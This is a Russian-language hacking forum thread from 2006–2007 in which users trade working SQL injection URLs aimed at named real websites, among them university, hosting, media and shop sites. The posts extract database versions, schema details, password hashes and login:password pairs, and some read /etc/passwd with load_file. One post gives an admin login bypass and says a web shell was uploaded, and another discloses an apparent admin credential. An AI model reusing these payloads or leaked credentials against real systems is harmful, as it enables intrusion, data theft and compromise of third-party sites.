SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Code:
    http://links.odessa.net/all_links.php3?s=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    1,4,7,12 видимые... они в самом низу.. помогите надыбать таблице и т.д. очень надо)
     
  2. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Grema
    Получите, распишитесь.
     
  3. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    http://www.sexshop-romantic.ro/sex-shop/?id=69+union+select+1,2,3--
     
  4. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    elpa.coe.missouri.edu
    Code:
    http://elpa.coe.missouri.edu/index.php?page=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11/*
    
     
  5. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.forsleep.ru/index.php?rn_id=-14+union+select+1,concat_ws(0x203a20,table_name,column_name),3,4,5,6,7+from+information_schema.columns/*
     
  6. k8^cat.YOU

    k8^cat.YOU Member

    Joined:
    12 Jul 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    0
    [​IMG]
    Межгосударственная телерадиокомпания «Мир»

    mysql 4, magic_quotes off, file_priv off.
    http://www.mirtv.ru/show.php?id=14968+order+by+5&templ=news
    http://www.mirtv.ru/show.php?id=-14968+union+select+1,version(),3,4,5&templ=news

    и вообще сайт очень насыщен sql-инекциями :eek:

    ps.
    http://www.mirtv.ru/admin/
    login: admin' or 1=1/*
    pass: k8<3you

    шелл залит, сюда не выкладывать и не дефейсить - будьте людьми. ваши варианты залития в пм :p
     
    #2726 k8^cat.YOU, 17 Jul 2007
    Last edited: 17 Jul 2007
    1 person likes this.
  7. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Странно.. шелл залил, но листинг директорий запрещен... бага банальная.. но лови +2 :)
     
  8. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    shop
     
  9. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    ПАРТИЯ ЗЕЛЁНЫХ Украины
    Социалистическая партия Украины (ток чёт я ту не разобрался:()
     
    #2729 Y.Dmitriy, 18 Jul 2007
    Last edited: 18 Jul 2007
  10. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Создание сайтов, веб дизайн, раскрутка сайтов, создание интернет-магазинов, создание мультимедийных презентаций, интранет-сайты, фирменный стиль, разработка логотипов, продвижение сайтов, поисковая оптимизация - OnArt
    www.onart.ru
    Хреново создают сайты, если у самих скулей полно ;)
    Code:
    http://www.onart.ru/index.php?page=54&id=-14+UNION+SELECT+1,2,3,concat(login,0x3a,password),5,6,7,8,9+from+users+limit+0,1/*
    
    admin:eek:nart333
     
  11. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    сайт какого-то хостера (divhost.ru)
    Code:
    http://divhost.ru/news.php?id=1+union+select+1,2,3,concat(user(),char(58),database(),char(58),version())/*
    
     
  12. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    еще один хостер
    www.ukrnic.com
    Code:
    http://www.ukrnic.com/hosting_info.php?id=-3+union+select+1,2,concat(user(),0x3a,version())/*
     
  13. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Code:
    http://www.housing.wisc.edu/resnet/news/story.php?id=-1+union+select+1,2,3,4,5,load_file(char(47,101,116,99,47,112,97,115,115,119,100,45)),7,8,9,0/*
     
  14. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Code:
    http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
     
  15. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    первая моя SQL-inj
     
    4 people like this.
  16. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    http://peacekeeper.ru
    user=\
    Code:
    http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,version(),8,user(),10,11,12,13/* 
    Code:
     http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13+from+Information_schema.columns+where+table_name=0x6d69726f74766f7265635f6d61696e/*
    Code:
    http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,concat(id,char(58),name2),8,9,10,11,12,13+from+mirotvorec_main/* 
     
    5 people like this.
  17. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    www.nihoncar.com
    Mysql Версия 5.

    root:
    Code:
    http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+from+mysql.user+limit+0,1/*
    есть форум, пользователи:
    Code:
    http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9+from+phpbb_users+limit+1,1/*
    лимит в помощь..
     
    2 people like this.
  18. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.it-news.cc/index.php?type=article&ID=-1+union+select+MenuID+from+Article/*

    ы
     
  19. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    www.wfsj.org
    Примечательно серв на Windows/IIS

    Code:
    http://www.wfsj.org/resources/page.php?id=-1+union+select+1,2,3,convert(concat(user(),0x3a,version()),binary),5,6,7,8,9,0,11/*
     
  20. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    PR=6
    inside.tufts.edu
    Code:
    http://inside.tufts.edu/announce/index.php?t=id&id=-471+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user()),0x3a),0x3a),4,5,6,7,8/*
    есть табица users но не могу подобрать колонки
     
Thread Status:
Not open for further replies.